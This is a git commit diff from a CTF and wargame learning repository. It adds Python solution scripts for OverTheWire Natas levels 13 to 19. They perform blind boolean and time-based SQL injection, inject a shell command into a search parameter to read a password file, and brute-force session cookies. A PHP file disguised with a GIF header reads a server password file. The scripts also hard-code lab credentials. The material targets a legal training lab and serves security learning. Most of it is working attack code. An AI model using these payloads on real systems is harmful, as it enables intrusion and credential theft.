web apps and natas

2025-05-03 07:14:54 -04:00 · 2014-10-16 06:14:45 -04:00 · 2014-10-16 06:14:45 -04:00 · fdbba7131b
commit fdbba7131b
parent 8c1733acda
19 changed files with 1888 additions and 18 deletions
--- a/CTFs_and_WarGames/2014-CSAW-CTF/cryptography/README.md
+++ b/CTFs_and_WarGames/2014-CSAW-CTF/cryptography/README.md
@ -5,12 +5,3 @@
 [My write-up](https://gist.github.com/bt3gl/a8617848ccb37e56034d)
 #### cfbsum
 [My write-up](https://gist.github.com/bt3gl/73cbe9a9f21b7c8c73a6)
 #### Feal
 [My write-up](https://gist.github.com/bt3gl/ff057566e256144291c7)
--- a/CTFs_and_WarGames/2014-CSAW-CTF/cryptography/crypto-200/README.md
+++ b/CTFs_and_WarGames/2014-CSAW-CTF/cryptography/crypto-200/README.md
@ -5,12 +5,3 @@
 [My write-up](https://gist.github.com/bt3gl/a8617848ccb37e56034d)
 #### cfbsum
 [My write-up](https://gist.github.com/bt3gl/73cbe9a9f21b7c8c73a6)
 #### Feal
 [My write-up](https://gist.github.com/bt3gl/ff057566e256144291c7)
--- a/Network&802.11/802.11
+++ b/Network&802.11/802.11
--- a/Network&802.11/802.11
+++ b/Network&802.11/802.11
--- a/Network&802.11/wireshark_stuff.md
+++ b/Network&802.11/wireshark_stuff.md
--- a/Reverse_Engineering/IDA_Pro_Shortcuts.pdf
+++ b/Reverse_Engineering/IDA_Pro_Shortcuts.pdf
--- a/Reverse_Engineering/cicada3301.jpg
+++ b/Reverse_Engineering/cicada3301.jpg
--- a/Reverse_Engineering/phpprimer_v0.1.pdf
+++ b/Reverse_Engineering/phpprimer_v0.1.pdf
--- a/Steganography/Images/image.png
+++ b/Steganography/Images/image.png
--- a/Steganography/Images/out_image.png
+++ b/Steganography/Images/out_image.png
--- a/Steganography/Images/sudoku.py
+++ b/Steganography/Images/sudoku.py
--- a/Steganography/Images/xor_bytes.py
+++ b/Steganography/Images/xor_bytes.py
--- a/Steganography/Images/xor_imag.go
+++ b/Steganography/Images/xor_imag.go
--- a/Web_Exploits/OS_Command_Injection/sqli_17_COMMAND_INJ.py
+++ b/Web_Exploits/OS_Command_Injection/sqli_17_COMMAND_INJ.py
@ -0,0 +1,46 @@
 #!/usr/bin/python
 __author__ = "bt3gl"
 __email__ = "bt33gl@gmail.com"
 import requests
 import string
 def brute_force_password(LENGTH, AUTH, CHARS, URL1, URL2):
        password = ''
        for i in range(1, LENGTH+1):
            for j in range (len(CHARS)):
                print("Position %d: Trying %s ..." %(i, CHARS[j]))
                r = requests.get( ( URL1 + password + CHARS[j] + URL2  ), auth=AUTH)
                if 'bananas' not in r.text:
                        password += CHARS[j]
                        print("Password so far: " + password)
                        break
        return password
 if __name__ == '__main__':
        # authorization: login and password
        AUTH = ('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh')
        # BASE64 password and 32 bytes
        CHARS = string.ascii_letters + string.digits
        LENGTH = 32
        # crafted url
        URL1 = 'http://natas16.natas.labs.overthewire.org?needle=$(grep -E ^'
        URL2 = '.* /etc/natas_webpass/natas17)banana&submit=Search'
        print(brute_force_password(LENGTH, AUTH, CHARS, URL1, URL2))
--- a/Web_Exploits/SQLi/sqli_16_brute_force_password.py
+++ b/Web_Exploits/SQLi/sqli_16_brute_force_password.py
@ -0,0 +1,45 @@
 #!/usr/bin/python
 __author__ = "bt3gl"
 __email__ = "bt33gl@gmail.com"
 import requests
 import string
 def brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2, KEYWORD):
        password = ''
        for i in range(1, LENGTH+1):
            for j in range (len(CHARS)):
                r = requests.get( ( SQL_URL1 + str(i) + SQL_URL2 + CHARS[j] ), auth=AUTH)
                print r.url
                if KEYWORD in r.text:
                        password += CHARS[j]
                        print("Password so far: " + password)
                        break
        return password
 if __name__ == '__main__':
        # authorization: login and password
        AUTH = ('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
        # BASE64 password and 32 bytes
        CHARS = string.ascii_letters + string.digits
        LENGTH = 32
        # crafted url option
        SQL_URL1 = 'http://natas15.natas.labs.overthewire.org?username=natas16" AND SUBSTRING(password,'
        SQL_URL2 = ',1) LIKE BINARY "'
        KEYWORD = 'exists'
        print(brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2, KEYWORD))
--- a/Web_Exploits/SQLi/sqli_18_timed_SQLi.py
+++ b/Web_Exploits/SQLi/sqli_18_timed_SQLi.py
@ -0,0 +1,46 @@
 #!/usr/bin/python
 __author__ = "bt3gl"
 __email__ = "bt33gl@gmail.com"
 import requests
 import string
 def brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2):
        password = ''
        for i in range(1, LENGTH+1):
            for j in range (len(CHARS)):
                r = requests.get( ( SQL_URL1 + str(i) + SQL_URL2 + CHARS[j] + SQL_URL3 ), auth=AUTH)
                time =  r.elapsed.total_seconds()
                print("Position %d: trying %s... Time: %.3f" %(i, CHARS[j], time))
                #print r.url
                if time >= 9:
                    password += CHARS[j]
                    print("Password so far: " + password)
                    break
        return password
 if __name__ == '__main__':
        # authorization: login and password
        AUTH = ('natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw')
        # BASE64 password and 32 bytes
        CHARS = string.ascii_letters + string.digits
        LENGTH = 32
        # crafted url option 1
        SQL_URL1 = 'http://natas17.natas.labs.overthewire.org?username=natas18" AND SUBSTRING(password,'
        SQL_URL2 = ',1) LIKE BINARY "'
        SQL_URL3 = '" AND SLEEP(10) AND "1"="1'
        print(brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2))
--- a/Web_Exploits/php/exploit_13.php
+++ b/Web_Exploits/php/exploit_13.php
@ -0,0 +1,5 @@
 GIF89a
 <?php
 readfile('/etc/natas_webpass/natas14
 '); 
 ?>
--- a/Web_Exploits/user_id/sqli_19_cookie_auth.py
+++ b/Web_Exploits/user_id/sqli_19_cookie_auth.py
@ -0,0 +1,34 @@
 #!/usr/bin/python
 __author__ = "bt3gl"
 __email__ = "bt33gl@gmail.com"
 import requests
 def brute_force_password(AUTH, URL, PAYLOAD, MAXID):
    for i in range(MAXID):
        HEADER ={'Cookie':'PHPSESSID=' + str(i)}
        r = requests.post(URL, auth=AUTH, params=PAYLOAD, headers=HEADER)
        print(i)
        if "You are an admin" in r.text:
            print(r.text)
            print(r.url)
 if __name__ == '__main__':
    AUTH = ('natas18', 'xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP')
    URL = 'http://natas18.natas.labs.overthewire.org/index.php?'
    PAYLOAD = ({'debug': '1', 'username': 'user', 'password': 'pass'})
    MAXID = 640
    brute_force_password(AUTH, URL, PAYLOAD, MAXID)
--- a/Web_Exploits/user_id/sqli_20_user_id_2.py
+++ b/Web_Exploits/user_id/sqli_20_user_id_2.py
@ -0,0 +1,45 @@
 #!/usr/bin/python
 __author__ = "bt3gl"
 __email__ = "bt33gl@gmail.com"
 import requests
 def brute_force_password(AUTH, URL, PAYLOAD, MAXID):
    for i in range(MAXID):
        HEADER ={'Cookie':'PHPSESSID=' + (str(i) + '-admin').encode('hex')}
        r = requests.post(URL, auth=AUTH, params=PAYLOAD, headers=HEADER)
        print(i)
        if "You are an admin" in r.text:
            print(r.text)
            print(r.url)
 if __name__ == '__main__':
    AUTH = ('natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs')
    URL = 'http://natas19.natas.labs.overthewire.org/index.php?'
    PAYLOAD = ({'debug': '1', 'username': 'admin', 'password': 'pass'})
    MAXID = 640
    brute_force_password(AUTH, URL, PAYLOAD, MAXID)